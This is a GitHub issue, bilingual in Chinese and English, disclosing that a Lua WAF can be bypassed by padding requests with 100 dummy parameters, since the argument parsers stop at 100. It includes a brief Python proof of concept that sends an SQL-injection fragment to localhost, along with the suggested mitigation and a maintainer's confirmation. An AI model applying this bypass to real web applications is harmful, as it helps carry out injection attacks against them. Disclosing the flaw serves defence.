Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
get_post_args 和 get_uri_args 默认只取前100个参数。 如果攻击者提交100个无用参数,再接上注入的参数,将绕过waf。 漏洞证明python脚本:
import requests args='a=1'+'&a=1'*99 sqli='b=select*from' r1 = requests.get('http://127.0.0.1/?'+sqli) print r1.url print r1.status_code #返回403 r2 = requests.get('http://127.0.0.1/?'+args+'&'+sqli) print r2.url print r2.status_code #返回200
官方建议是使用以下代码拒绝参数过多的请求
local args, err = ngx.req.get_post_args() if err == "truncated" then -- one can choose to ignore or reject the current request here end
The text was updated successfully, but these errors were encountered:
get_post_args and get_uri_args will only return 100 args by default If attacker add 100 args before actual attack argument,waf will be bypassed。 POC in python:
import requests args='a=1'+'&a=1'*99 sqli='b=select*from' r1 = requests.get('http://127.0.0.1/?'+sqli) print r1.url print r1.status_code #403 r2 = requests.get('http://127.0.0.1/?'+args+'&'+sqli) print r2.url print r2.status_code #200
The official doc's advice is to use the following code to rejected the request。
Sorry, something went wrong.
多谢,这确实是个漏洞,欢迎你提交 pr 来修复,或者我过段时间不忙了会来修复这个
Is this issue already fixed ? Kind regards!
No branches or pull requests
get_post_args 和 get_uri_args 默认只取前100个参数。
如果攻击者提交100个无用参数,再接上注入的参数,将绕过waf。
漏洞证明python脚本:
官方建议是使用以下代码拒绝参数过多的请求
The text was updated successfully, but these errors were encountered: